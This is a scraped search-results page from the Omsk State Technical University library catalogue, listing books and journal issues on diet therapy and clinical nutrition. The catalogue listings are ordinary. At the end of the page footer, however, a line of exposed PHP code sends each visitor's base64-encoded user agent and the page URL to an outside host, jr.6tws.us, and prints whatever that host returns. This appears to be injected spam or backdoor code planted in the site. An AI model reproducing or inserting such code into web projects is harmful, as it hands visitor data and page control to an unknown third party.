Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

300 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Диетотерапия")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 22
1. 
Липовский, Самуил Моисеевич. Питание при беременности [Текст] / С. М. Липовский, 1976. - 95, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
2. 
Поваляева, Мария Афанасьевна. Нетрадиционные методы в коррекционной педагогике / М. А. Поваляева, 2006. - 349 с.
Ключевые слова 
коррекционная педагогика -- нетрадиционная коррекционная педагогика -- лечебная педагогика -- фитотерапия -- лечение комнатными растениями -- садотерапия -- диетотерапия -- овощетерапия -- фруктотерапия -- лечение ягодами -- лечение виноградом -- ампелотерапия -- лечение животными -- эманотерапия -- терапевтическая верховая езда -- медолечение -- апитерапия -- закаливание -- климатотерапия -- лечение воздухом -- аэротерапия -- лечение светом -- гелиотерапия -- водолечение -- гидротерапия -- талассотерапия -- лечение водорослями -- альготерапия -- глинотерапия -- грязелечение -- фанготерапия -- лечение песком -- псиммотерапия -- лечение камнями -- литотерапия -- металлотерапия -- психотерапия -- куклотерапия -- сказкотерапия -- смехотерапия -- кинезотерапия -- гимнастика мозга -- кинесиология -- точечный массаж -- дыхательная гимнастика -- коррекция зрения -- физиотерапевтические процедуры -- магнитотерапия -- музыкотерапия -- танцетерапия -- цветотерапия -- хромотерапия
Держатели документа (Информация об экземплярах) 
3. 
Ветитнев, Александр Михайлович. Курортное дело : учебное пособие для вузов по специальности "Социально-культурный сервис и туризм" / А. М. Ветитнев, Л. Б. Журавлева, 2007. - 528 с.
Ключевые слова 
здравоохранение -- лечебно-оздоровительный туризм -- курортная медицина -- санаторно-курортные услуги -- ПРОФИЛАКТИЧЕСКОЕ -- РЕКРЕАЦИОННЫЕ -- ИСТОРИЯ -- РАЗВИТИЯ -- РЕСУРС -- ЛЕЧЕБНЫЕ -- МИНЕРАЛЬНЫЕ -- ГРЯЗЕЛЕЧЕНИЕ -- ПРАКТИКА -- КЛИМАТОЛОГИЯ -- ЛАНДШАФТНАЯ -- РЕКРЕАЛОГИЯ -- РЕДКИЕ -- ДИЕТОТЕРАПИЯ -- ОЗДОРОВЛЕНИЕ -- АНИМАЦИОННО -- ДОСУГОВАЯ ДЕЯТЕЛЬНОСТЬ -- САНАТОРНО-КУРОРТНЫЕ ОРГАНИЗАЦИИ -- ТУРИЗМ -- МИРОВЫЕ -- КУРОРТ -- УПРАВЛЕНИЕ -- ФОРМЫ -- БАЛЬНЕОТЕХНИКА -- ПРАВОВОЕ РЕГУЛИРОВАНИЕ
4. 
Лишка, Ева. Голодание на основе фруктовых и овощных соков / Е. Лишка, Н. Лишка ; пер. с нем. С. Казанцева, 2001. - 144 с.
Держатели документа (Информация об экземплярах) 
5. 
Вопросы питания. - Журнал, 2011г. т. 80 № 1
Оглавление 
  • Спиричев, В. Б. Научные и практические аспекты патогенетически обоснованного применения витаминов в профилактических и лечебных целях. / В. Б. Спиричев. - с.4-13
  • Оценка влияния ГМО растительного происхождения на развитие потомства крыс в трех поколениях. - с.14-28
  • Суханов, Б. П. Санитарно-эпидемиологическая экспертиза пищевых продуктов / Б. П. Суханов, М. Г. Керимова, Е. В. Елизарова. - с.29-33
  • Соколов, Д. М. Петрифильмы - современные тесты для микробиологического контроля пищевых продуктов, сырья и объектов среды обитания / Д. М. Соколов, М. С. Соколов, И. В. Кашинцев. - с.34-38
  • Гладышев, О. А. Диетотерапия больных, страдающих нервной анорексией и нарушением пищевого поведения, в условиях стационара / О. А. Гладышев, В. А. Исаков, А. К. Шаховская. - с.39-45
  • Помыткина, Т. Е. Влияние диеты с повышенным содержанием белка на клинические проявления язвенной болезни желудка и двенадцатиперстной кишки у работников химического предприятия / Т. Е. Помыткина. - с.46-50
  • Риск и профилактика острого панкреатита при энтеральном зондовом питании больных, оперированных по поводу деструктивного холецистита. - с.51-54
  • Петренко, А. С. Практика использования биологически активных добавок к пище в зарубежных странах / А. С. Петренко, Б. П. Суханов. - с.55-63
  • Использование биологически активной добавки, приготовленной на основе ягод калины, для предотвращения физиологических и биохимических изменений эритроцитов, возникающих при различных стрессах. - с.64-69
  • Роль факторов питания при интенсивных физических нагрузках спортсменов. - с.70-77
  • Фактическое питание и физическое состояние спортсменов сборной России по санному спорту. - с.78-80
  • Иванов, А. С. Новые принципы доставки блюд в лечебные отделения / А. С. Иванов. - с.81-83
  • Памяти Вильяма Давидовича Ванханена. - с.84
Держатели документа (Информация об экземплярах) 
6. 
Вопросы питания. - Журнал, 2004г. № 5
Оглавление 
  • Гигиеническая оценка состояния питания детей дошкольного возраста Мурманска / ; С. В. Дмитриевская, А. В. Истомин, А. А. Королев и др.. - с.6-10
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Серебрянский, Е. П. Комбинированный метод спектрального анализа при определении химического элементного состава пищевых продуктов / Е. П. Серебрянский, М. Г. Скальная, Р. М. Дубовой. - с.10-14
  • Беркетова, Л. В. Содержание витаминов С, Е, В6, каротина и пищевых волокон в грибах / Л. В. Беркетова, М. П. Григорьева, Л. А. Харитончик. - с.14-16
  • Влияние биологически активной добавки к пище, содержащей хром, на клинико-метаболические показатели у больных сахарным диабетом 2 типа. - с.17-20
    Кл. слова: БАД, ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ
  • Влияние диетотерапии с применением кисломолочного продукта, обогащенного амарантом, на систему антиоксидантной защиты у больных с сердечно-сосудистой патологией. - с.21-23
    Кл. слова: ДИЕТОТЕРАПИЯ, ПРОДУКТ КИСЛОМОЛОЧНЫЙ
  • Использование биологически активной добавки к пище, приготовленной на основе альгината кальция, в коррекции нарушений печени при вирусных гепатитах / ; О. В. Савченко, Э. В. Щур, О. В. Гафарова, Т. М. Гайнулина. - с.24-26
    Кл. слова: БАД, ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Петухов, А. Б. Искусственное питание в клинической практике: современное состояние проблемы / А. Б. Петухов, И. Г. Бакулин. - с.27-31
    Кл. слова: ПИТАНИЕ ИСКУССТВЕННОЕ
  • Биологически активные добавки к пище и лекарственные средства растительного происхождения. Оценка безопасности и стандартизация. - с.32-37
    Кл. слова: БАД, ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Гаджиева, З. М. Основные вехи становления и развития патоморфологической службы в Институте питания РАМН / З. М. Гаджиева, А. Л. Поздняков. - с.38-41
  • Жукова, Г. Ф. Методы количественного определения йода в пищевых продуктах и продовольственном сырье / Г. Ф. Жукова, С. А. Савчик, С. А. Хотимченко. - с.42-47
Держатели документа (Информация об экземплярах) 
7. 
Вопросы питания. - Журнал, 2007г. № 6
Оглавление 
  • Онищенко, Г. Г. О концепции токсикологических исследований, методологии оценки риска, методов идентификации и количественного определения наноматериалов / Г. Г. Онищенко, В. А. Тутельян. - с.4-8
    Кл. слова: НАНОМАТЕРИАЛ
  • Использование жировой нагрузки со среднецепочечными жирными кислотами в качестве теста оценки усвоения липидов и внешнесекреторной функции поджелудочной железы у больных хроническим панкреатитом. - с.9-12
    Кл. слова: ПАНКРЕАТИТ
  • Букавнева, Н. С. Методические подходы к использованию комплексных антропометрических методов исследования в клинической практике / Н. С. Букавнева, А. Л. Поздняков, Д. Б. Никитюк. - с.13-16
  • Анализ состава тала у больных с метаболическим синдромом методом биоимпедансометрии. - с.17-20
    Кл. слова: СИНДРОМ МЕТАБОЛИЧЕСКИЙ, БИОИМПЕДАНСОМЕТРИЯ
  • Оценка клинической эффективности диетотерапии у кардиохирургических больных. - с.21-27
    Кл. слова: ДИЕТОТЕРАПИЯ
  • Клиникоэкспериментальное изучение метаболических эффектов жира печени акулы. - с.28-32
    Кл. слова: ПЕЧЕНЬ АКУЛЫ
  • Разгрузочно-диетическая терапия при заболеваниях желудочно-кишечного тракта. - с.33-38
    Кл. слова: ТЕРАПИЯ РАЗГРУЗОЧНО-ДИЕТИЧЕСКАЯ
  • Предпосылки и факторы формирования региональной политики в области здорового питания в России. - с.39-43
    Кл. слова: ПИТАНИЕ ЗДОРОВОЕ
  • Трошина, М. Ю. Схема организационных мер по улучшению питания проводников пассажирских вагонов поездов дальнего следования / М. Ю. Трошина. - с.44-47
    Кл. слова: ПИТАНИЕ ПРОВОДНИКОВ
  • Влияние длительного хранения сухих молочных смесей для детского питания на содержание в них витаминов А, Е, величину перекисного числа и антиоксидантную активность. Сравнение с грудным молоком. - с.48-53
    Кл. слова: СМЕСЬ детская молочная
  • Безалкогольный газированный напиток, приготовленный на основе картофельного концентрата. - с.54-59
    Кл. слова: НАПИТОК БЕЗАЛКОГОЛЬНЫЙ
  • Влияние таблетированной формы чеснокa "Алликор" на обмен липидов и риск фатальных сердечно-сосудистых осложнений у пациентов с атрогенной дислипопротеидемией. - с.60-64
  • Леханова, Е. н. Эффективность использования биологически активной добавки, богатой минеральными веществами, в комплексном лечении гипертонической болезни в условиях Крайнего Севера / Е. н. Леханова, Л. И. Кирилюк, Ю. В. Романова. - с.65-68
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
  • Токаев, В. С. Медико-биологические аспекты создания и применения специализированных белковых продуктов для питания спортсменов / В. С. Токаев, Р. Ю. Мироедов. - с.69-73
    Кл. слова: ПРОДУКТ БЕЛКОВЫЙ
Держатели документа (Информация об экземплярах) 
8. 
Вопросы питания. - Журнал, 2007г. № 5
Оглавление 
  • Влияние пищевых модифицированных крахмалов на состав и фагоцитарную активность перитонеальных клеток. - с.4-10
    Кл. слова: КРАХМАЛ МОДИФИЦИРОВАННЫЙ
  • Активность антиоксидантных ферментов при недостаточном содержании в рационе белка и избытке Cu, Zn, Mn, и Se. - с.11-16
    Кл. слова: ФЕРМЕНТ АНТИОКСИДАНТНЫЙ
  • Энергетический обмен у больных ишемической болезнью сердца до и после кардиваскулярных операций. - с.17-21
  • Оценка эффективности диетотерапии на основе клинико-метаболических показателей у больных сердечно-сосудистыми заболеваниями с пониженной плотностью костной ткани. - с.22-27
    Кл. слова: ДИЕТОТЕРАПИЯ
  • Зыкина, В. В. Роль алиментарного фактора в инсулино-резистентности при сахарном диабете типа 2 / В. В. Зыкина, Х. Х. Шарафетдинов, О. А. Плотникова. - с.28-34
    Кл. слова: ДИАБЕТ САХАРНЫЙ, ИНСУЛИНО-РЕЗИСТЕНТНОСТЬ
  • Влияние различных пищевых рационов на особенности формирования фекального микробиоценоза. - с.35-38
    Кл. слова: МИКРОБИОЦЕНОЗ
  • Пищевая ценность птицеводческой продукции при длительном включении в корм птиц хитозана. - с.39-42
  • Шульгин, Ю. П. Качество пищевых морепродуктов Приморского края / Ю. П. Шульгин, Л. Ю. Лажанцева. - с.48-50
    Кл. слова: КАЧЕСТВО морепродуктов
  • Лобанова, Л. П. Обеспеченность микронутриентами пришлого населения Крайнего Севера / Л. П. Лобанова, Е. В. Агбалян. - с.51-54
    Кл. слова: МИКРОНУТРИЕНТЫ
  • Использование биологически активной добавки на основе калия и магния при экспериментальной кардиовазопатии. - с.55-59
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
Держатели документа (Информация об экземплярах) 
9. 
Вопросы питания. - Журнал, 2006г. № 6
Оглавление 
  • Гмошинский, И. В. Микроэлементы в питании человека: биологические индикаторы недостаточности цинка / И. В. Гмошинский, Б. Мунхуу, В. К. Мазо. - с.4-11
    Кл. слова: ЦИНК - ПИТАНИЕ
  • Чехонина, Ю. Г. Диетотерапия при при хроническом панкреатите / Ю. Г. Чехонина, М. М. Гаппаров, А. К. Шаховская. - с.12-17
  • Сравнительная оценка антиоксидантной активности фикоцианина и селенфикоцианина in vitro и ex vivo. - с.18-23
  • Конюхова, О. С. Результаты применения магнийсодержащих препаратов и различных нагрузочных доз витаминов В1 и В2 у добровольцев / О. С. Конюхова, Е. В. Ших, Л. И. Красных. - с.24-29
  • Влияние антиатерогенной диеты с применением масла амаранта на антиоксидантный и иммунный статус у больных ишемической болезнью сердца и гиперлипопротеидемией. - с.30-33
  • Определение флавоноидов в овощах и фруктах и принципы создания расчетной базы данных для оценки потребления флавоноидов населением. - с.34-37
  • Шевелева, С. А. Загразненность пищевых продуктов бактериями рода Campylobacter / С. А. Шевелева, Ж. Н. Шурышева, И. И. Пискарева. - с.38-43
  • Шурышева, Ж. Н. Методические подходы к изучению распространенности и количественного содержания бактерий рода Campylobacter в пищевых продуктах / Ж. Н. Шурышева, С. А. Шевелева. - с.44-50
  • Матисон, В. А. Особенности внедрения НАССР в систему общественного питания / В. А. Матисон, Е. В. Крюкова, Г. Ю. Шилов. - с.51-54
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ
  • Сравнительная характеристика методов определения в пищевых продуктах компонентов из генно-инженерно-модифицированных организмов растительного происхождения / ; О. В. Анисимова, Н. А. Кашина, О. Н. Чернышева, В. А. Тутельян . - с.55-60
    Кл. слова: ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦ
  • Экспресс-метод оценки подлинности жировых продуктов, разработанный на основе компьютерного информационного обеспечения / ; Е. В. Викторова, С. Н. Кулакова, Н. А. Михайлов, М. М. Гаппаров. - с.61-66
  • Седова, И. Б. Изучение загрязнения продуктов детского питания фумонизинами В1 и В2 / И. Б. Седова, В. А. Тутельян. - с.67-71
    Кл. слова: ПИТАНИЕ ДЕТЕЙ
  • Определение дегидрацетовой кислоты и ее натриевой соли в продуктах питания и полимерных оболочках. - с.72-78
Держатели документа (Информация об экземплярах) 
10. 
Лишка, Ева. Голодание на основе фруктовых и овощных соков / Е. Лишка, Н. Лишка ; пер. с нем. С. Казанцева, 2001. - 144 с.
Держатели документа (Информация об экземплярах) 
11. 
Покорн Д. Полная энциклопедия лечебного питания [Текст] : энциклопедия / Д. Покорн, 1998. - 574,[1] с.
Ключевые слова 
ПИТАНИЕ ЛЕЧЕБНОЕ -- Гигиена питания -- ПИТАНИЕ ЗДОРОВОЕ -- Питание - здоровье -- Питание сбалансированное -- БЕЛКИ - питание -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- САХАР - питание -- ЖИРЫ - питание -- ВИТАМИНЫ -- Натрий - питание -- Калий - питание -- Кальций - питание -- Магний - питание -- Фосфор - питание -- Микроэлементы - питание -- Йод - питание -- Фтор - питание -- Железо - питание -- Цинк - питание -- Селен - питание -- Медь - питание -- Хром - питание -- Клетчатка - питание -- ВОДА - питание -- Диета геропрофилактическая -- Диета молочная -- Диета рыбная -- Вегетаринство -- Питание макробиотическое -- Гастрономия -- Питание женщин беременных -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ УЧАЩИХСЯ -- Питание спортсменов -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- Питание диетотерапевтическое -- ДИЕТА ЛЕЧЕБНАЯ -- КОРМЛЕНИЕ -- ОБМЕН ВЕЩЕСТВ - нарушения -- Диабет сахарный -- Гипогликемия -- Остеопороз -- Диета для похудения -- Анемия -- Аллергия пищевая -- Авитаминоз -- Ожирение -- ПОСТ православный -- Сбор лекарственный -- РАСТЕНИЯ ЦЕЛЕБНЫЕ
Держатели документа (Информация об экземплярах) 
12. 
Николайчук, Лидия Владимировна. Лечебно-диетические блюда при сахарном диабете [Текст] / Л. В. Николайчук, Е. П. Тихонова, Т. П. Левченко, 1993. - 158, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Бренц, Милита Яновна. Технология приготовления диетических блюд [Текст] : учеб. пособие для техникумов по специальности 1016 "Технология приготовления пищи" / М. Я. Бренц, В. В. Бурлимова, 1988. - 174, [1] с.
14. 
Раздельное питание [Текст] / сост. Н. Е. Макарова ; дар. О. Н. Зюзькова, 1998. - 479 с.
Держатели документа (Информация об экземплярах) 
15. 
Зинец, Игорь Иванович. Здоровье и диета [Текст] : 100 лечеб. рационов, 500 рецептов диет. блюд / И. И. Зинец, 1995. - 470 с.
Держатели документа (Информация об экземплярах) 
16. 
Литвина, Инна Иосифовна. Три пользы [Текст] / И. И. Литвина, 1989. - 206, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
17. 
Сборник по народной медицине и нетрадиционным способам лечения [Текст] / сост. Г. З. Минеджян, 1993. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
18. 
Сборник по народной медицине и нетрадиционным способам лечения [Текст] / сост. Г. З. Минеджян, 1993. - 575 с.
Держатели документа (Информация об экземплярах) 
19. 
Эвенштейн, Зиновий Михайлович. Популярная диетология [Текст] / З. М. Эвенштейн, 1990. - 316, [3] с.
Ключевые слова 
ФИЗИОЛОГИЯ -- БИОХИМИЯ -- ПИТАНИЕ -- РАЦИОНАЛЬНОЕ -- ДИЕТА -- КУЛИНАРИЯ -- ВОЛОКНО ПИЩЕВОЕ -- КИСЛОТЫ ОРГАНИЧЕСКИЕ -- ВЕЩЕСТВО ДУБИЛЬНОЕ -- ПИГМЕНТЫ -- ФИТОНЦИДЫ -- ХОЛЕСТЕРИН - ПИТАНИЕ -- ПИЩЕВОРЕНИЕ -- ВКУС ПИЩИ -- АППЕТИТ -- ЖАЖДА -- ГОМЕОСТАЗ -- АЛЛЕРГИЯ ПИЩЕВАЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- МАССА ТЕЛА НОРМАЛЬНАЯ -- ОЖИРЕНИЕ -- ДИЕТОТЕРАПИЯ -- КУЛИНАРИЯ ДИЕТИЧЕСКАЯ -- БЛЮДА ДИЕТИЧЕСКИЕ -- СЛАДКОЕДЕНИЕ -- СОЛЬ ПОВАРЕННАЯ -- ПРЯНОСТИ -- КОФЕ -- ВИНО -- ЦЕННОСТЬ ПИЩЕВАЯ
20. 
Гурвич, Михаил Меерович. Домашняя диетология [Текст] / М. М. Гурвич, 1992. - 77, [2] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
21. 
Домашняя энциклопедия [Текст] : [В 6 т.]. Т. 1 : Питание- здоровье / Г. И. Молчанов, И. А. Молчанова, М. С. Лукьянчиков, А. Г. Молчанов; Н. Г. Воробьев, 1993. - 478 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2785 - 24.01.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.49 с.22 запросов, 3.63c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;